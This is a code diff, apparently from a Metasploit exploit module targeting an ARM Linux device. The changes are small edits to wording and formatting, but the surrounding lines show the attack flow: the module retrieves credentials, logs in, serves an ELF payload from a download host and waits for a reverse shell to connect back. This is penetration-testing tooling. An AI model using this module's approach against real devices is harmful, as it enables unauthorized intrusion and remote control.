@@ -51,10 +51,10 @@ def initialize(info = {})
51
51
OptAddress . new ( 'DOWNHOST' , [ false , 'An alternative host to requst the ARMLE payload from' ] ) ,
52
52
OptString . new ( 'DOWNFILE' , [ false , 'Filename to download, (default: random)' ] ) ,
53
53
OptInt . new ( 'HTTP_DELAY' , [ true , 'Time that the HTTP Server will wait for the ELF payload request' , 60 ] ) ,
54
- OptInt . new ( 'CONNECTBACK_DELAY' , [ true , 'Time to wait for shell to connect back to attacker ' , 10 ] )
54
+ OptInt . new ( 'CONNECTBACK_DELAY' , [ true , 'Time to wait for shell to connect back to listener ' , 10 ] )
55
55
] )
56
56
end
57
-
57
+
58
58
def check
59
59
begin
60
60
res = send_request_cgi ( {
@@ -218,13 +218,11 @@ def execute(cmd, username, password)
218
218
219
219
220
220
def exploit
221
-
222
221
print_status ( "#{ peer } - Connecting to target..." )
223
222
224
223
unless check == Exploit ::CheckCode ::Detected
225
224
fail_with ( Failure ::Unknown , "#{ peer } - Failed to access vulnerable url" )
226
225
end
227
-
228
226
#
229
227
# Information Retrieval, obtains creds and logs in
230
228
#
@@ -336,7 +334,7 @@ def on_request_uri(cli, request)
336
334
# Waits for shell to connect back to us, otherwise server stops and nothing is returned
337
335
#
338
336
def wait_for_connect
339
- print_status ( "#{ peer } - Waiting for shell to connect back to us..." )
337
+ print_status ( "#{ peer } - Waiting #{ datastore [ 'CONNECTBACK_DELAY' ] . to_s } seconds for shell to connect back to us..." )
340
338
waited = 0
341
339
while ( @elf_sent )
342
340
select ( nil , nil , nil , 1 )
0 commit comments